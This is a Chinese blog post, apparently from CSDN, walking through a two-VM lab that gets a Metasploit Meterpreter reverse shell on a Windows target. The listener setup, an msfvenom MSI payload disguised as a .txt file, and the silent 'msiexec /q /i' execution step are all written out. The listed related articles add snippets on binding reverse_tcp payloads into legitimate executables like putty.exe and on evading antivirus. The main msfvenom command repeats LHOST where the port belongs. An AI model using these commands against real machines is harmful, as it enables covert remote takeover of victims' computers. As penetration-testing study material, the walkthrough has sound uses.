msf--基于msiexe+txt的载荷执行

最新推荐文章于 2024-01-27 12:00:00 发布
最新推荐文章于 2024-01-27 12:00:00 发布
阅读量427 收藏
点赞数
分类专栏: # 工具类
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44108455/article/details/103962486
版权
0x00设备:

两台虚拟机
一台kali(ip为122.122.10.122)生成载荷
一台windows主机(目标机器)

kali端

第一阶段
1.ifcongfig 查看本机ip
2.打开msfmsfconsole 在这里插入图片描述
3.做一个服务器,处理人家反弹过来的东西,可以放在阿里云主机上use expoit/multi/handler
4.利用一个载荷set payload windows/meterpreter/reverse_tcp
5.设置本地地址set LHOST 0.0.0.0
0.0.0.0 表示绑定本机的所有地址
6.设置本地端口set LPORT 5555
7.run
在这里插入图片描述
第二阶段
再打开一个命令行
输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=122.122.10.122 LHOST=5555 -f msi -o hoo.txt
文件类型是msi,会在root目录下生成一个hoo.txt文件
在这里插入图片描述在这里插入图片描述
第三阶段
把hoo.txt文件传到Windows那台目标机器上,然后
输入msiexec /q /i hoo.txt
在这里插入图片描述
然后kali机器上就成功反馈了
在这里插入图片描述

0x02

好文推荐 (不是很明白)
https://www.freebuf.com/articles/system/155147.html

红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 1027
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
网络安全渗透
李子木的博客
04-04 8717
Sqlmap简介 sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试神器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 支持的数据库:MySQL,Oracle, PostgreSQL, SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。 Sqlmap安装 (1)安装sqlmap前,需要.
MSF同步框架 2.0 x64中文安装包
05-14
微软同步框架2.0版本x64中文安装包,需要的请下载吧。
MSF --Windows系统后门之exe文件
Kevin's Blog
04-28 2021
文章目录一、环境二、操作2.1 攻击者操作2.2 受害者操作 以下所有的内容仅供网安学习参考,非法攻击他人计算机应后果给予法律制裁!!! 一、环境 Windows 2008 R2(虚拟机,受害者,192.168.7.131) Kali(虚拟机,攻击者,192.168.7.129) 二、操作 2.1 攻击者操作 目的:给windows账户留个后门,这里未提供免杀操作 》》前提MSF能够...
利用msfvenom制作绑定攻击代码的木马程序
m0_43406494的博客
11-13 1133
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.94.135 LPORT=7777 -x putty.exe -k -f exe -o payload.exe o参数指定输出文件名,这里使用payload.exe,一般会改成一些人畜无害的文件名 -x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。绑定程序自定义,只要能引诱到目标运行它,这里随便选用putty.exe 选用payload use expl
metasploit的msfpayload创建可独立运行的二进制文件
天元喜羊羊的博客
04-28 3809
root@bt:~# msfpayload windows/shell_reverse_tcp O Name: Windows Command Shell, Reverse TCP Inline Module: payload/windows/shell_reverse_tcp Version: 14774 Platform: Windows
渗透测试中的msiexec
weixin_34357887的博客
09-25 1001
本文讲的是渗透测试中的msiexec, 0x00 前言 在上篇研究了ClickOnce的渗透技巧,接触到了安装包的概念。关于安装包还有一个常见的是msi文件,可在命令行下通过msiexec安装,所以这次就研究一下msiexec在渗透测试中的利用技巧 0x01 简介 msiexec: 系统进程,是Windows Installer的一部分 用于安装Win...
MSF学习
willow_liang的博客
12-03 2056
目录 Metasploit模块 主机扫描 查找扫描模块 使用扫描模块 使用nmap扫描 搜索和使用samba的漏洞利用模块 后渗透攻击:信息收集 使用ms17-010对win7进行渗透 进程迁移 查看系统信息 截图 文件系统命令 权限提升 将meterpreter转换为后台执行 令牌窃取 hash攻击 或者上传pwdump,wce工具获取hash 使用mimikatz抓取密码 后渗透攻击:后门 1.Cymothoa后门 2.Persistence后门 3.w.
20202422 2022-2023-2 《网络与系统攻防技术》实验二实验报告
cdssywgyxx的博客
03-29 1380
1.netcatnetcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它。使用netcat命令所能完成的事情令人惊讶。netcat所做的就是在两台电脑之间建立链接并返回两个数据流,在这之后所能做的事就看你的想像力了。你能建立一个服务器,传输文件,与朋友聊天,传输流媒体或者用它作为其它协议的独立客户端。举例如下:就能实现一个简单的指定端口的通信,如下图,可以双向通信。图1 简单的nc通信2.socat。
网络对抗技术-Exp3-免杀原理 20181314
weixin_46014245的博客
03-31 796
一、免杀原理及基础问题回答 1.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。 反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础。 2.基础问题回答 杀软是如何检测出恶意代码的? 基于特征码的检测:简单来说一段特征码就是一段或多段数据,经过对许多恶意代码的分析,我们发现了该类恶意代码经常出
msi的简单使用
最新发布
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
01-27 1052
Windows Installer 使用安装包,其中包含 Windows Installer 需要安装、卸载或修复产品以及运行安装程序用户界面 (UI) 的信息。每个安装包都包含一个.msi文件,该文件包含安装数据库、摘要信息流和安装的各个部分的数据流。
Metasploit 实现木马生成、捆绑及免杀
阿里云云栖号
10-08 5673
简介:在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。本次实验我们将学习如何通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理。木马文件风险高,想要免杀需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。 实验环境: Kali Linux 知识点: msfvenom 如何生.
msf生成payload并注入到可执行程序exe中
redwand的博客
07-22 5788
msfconsole下的generate与msfvomen命令实际是不同环境下的同一个命令,其功能基本相同,这里我们要学习的重点是使用-k -x 选项将payload注入到可以执行文件exe中,这项技能在实战中后渗透测试的可持久化中经常会被用到。
kali基础命令(二)
不秃头的程序Yang
04-21 3632
文件夹或文本操作 1、显示当前工作路径 pwd 2、返回上一级目录 cd .. 3、进去当前用户主目录 cd ~ 4、创建文件 touch test.txt 5、创建文件夹 mkdir test 6、显示文件和文件夹名 ls 显示文件和文件夹名 ls -a 显示所有的文件和文件夹 包含隐藏文件 ls -l 显示文件和目录的详细资料 7、删除 rm -rf 文件/文件夹 ...
kali文件重命名_kali linux下的文件的创建,以及编辑保存
weixin_39863741的博客
12-19 1261
创建文件夹步骤:1.mkdir +desktop(路径)/ index(文件夹名)在桌面创建了一个index文件夹mkdir +123456 +desktop(路径)/ index.txt(文件夹名)在桌面创建了一个index.txt文件夹,但需要权限 123456 才能访问2.rm -(选项) +所要删除的文件绝对路径rm -r index将index的子目录及子目录以下的所有文件都删除创...
windows提权系列上篇
hl1293348082的专栏
04-08 331
在渗透测试中,提升自己的权限是经常遇到的问题,往往在渗透中最容易获取的权限就是一个webshell,如果网站是架设在Windows系统上的,这时就可能遇到这样的问题,还有一种情况是在做横向渗透的时候,收集到一些可以远程连接桌面的帐号,这是也需要,在实际的渗透中有很多的地方会需要这个操作,这个系列就主要介绍各种提权的方式。 提权基础 在提权之前首先要做的是对系统的操作系统信息做一些信息收集,关于信息收集的介绍请看之前的文章《Windows环境下的信息收集》,这里简单提一下这几条命令: systemin
msfvenom 生成shellcode
nethm的专栏
09-20 7987
先来看下msfvenomd的帮助 root@localhost:~# msfvenom -h Error: MsfVenom - a Metasploit standalone payload generator. Also a replacement for msfpayload and msfencode. Usage: /usr/bin/msfvenom [options] O
MFC 主窗口调用子窗口
u012123768的博客
09-27 4358
功能:MFC主窗口创建子窗口,同时隐藏本窗口;当子窗口关闭时,继续显示主窗口;子窗口关闭时,复写关闭窗口函数。 1 在主窗口,创建两个按钮。 2 创建两个子窗口界面。资源视图->Dialog(右键)->添加资源->Dialog。然后将对应的名字修改了,我改成了IDD_WINDOW_ONE和IDD_WINDOW_TWO。 3 右键新建出来的窗口,添加类。我这里设置两个类:windowOne和windowTwo。 4 在主窗口的***Dlg.h添加上面两个.h文件,同时初始化两
Metasploit 整理笔记
ling_xiao007的专栏
02-21 5850
Metasploit整理笔记
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值